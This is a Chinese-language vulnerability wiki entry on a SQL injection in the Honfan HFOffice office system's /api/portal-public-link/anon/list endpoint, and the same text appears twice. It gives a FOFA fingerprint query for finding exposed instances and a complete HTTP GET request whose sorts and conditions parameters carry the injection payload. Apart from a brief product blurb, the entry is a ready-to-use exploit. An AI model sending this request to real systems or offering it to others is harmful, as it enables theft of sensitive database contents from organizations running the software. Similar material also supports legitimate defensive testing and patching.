fofamini-wiki

登录白背景

源码

红帆HFOffice anon/list存在SQL注入漏洞

一、漏洞简介

红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆HFOffice anon/list存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

二、影响版本

红帆HFOffice

三、资产测绘

fofaapp="红帆-HFOffice"
特征

四、漏洞复现

GET /api/portal-public-link/anon/list?sorts=[{"Field":"SortID","SortBy":2},{"Field":'1',"SortBy":'1'}]&conditions=[{"Field":"IsEnable","DataType":1,"Option":1,"Value":'user'},{"Field":"Module","DataType":1,"Option":7,"Value":"1"}] HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/nuz6qy9tsw9mqiuz

# 红帆HFOffice anon/list存在SQL注入漏洞

# 一、漏洞简介
红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆HFOffice anon/list存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

# 二、影响版本
+ 红帆HFOffice

# 三、资产测绘
+ fofa`app="红帆-HFOffice"`
+ 特征

![1716452438963-a6f1f3b3-faf2-43df-9b01-cb8255f2c3b4.png](./img/KUPKzFPxZISIR9uT/1716452438963-a6f1f3b3-faf2-43df-9b01-cb8255f2c3b4-442487.png)

# 四、漏洞复现
```plain
GET /api/portal-public-link/anon/list?sorts=[{"Field":"SortID","SortBy":2},{"Field":'1',"SortBy":'1'}]&conditions=[{"Field":"IsEnable","DataType":1,"Option":1,"Value":'user'},{"Field":"Module","DataType":1,"Option":7,"Value":"1"}] HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
```

![1716452265688-f4928d09-8203-471d-8e0f-4bac8dd4c6f9.png](./img/KUPKzFPxZISIR9uT/1716452265688-f4928d09-8203-471d-8e0f-4bac8dd4c6f9-951843.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nuz6qy9tsw9mqiuz>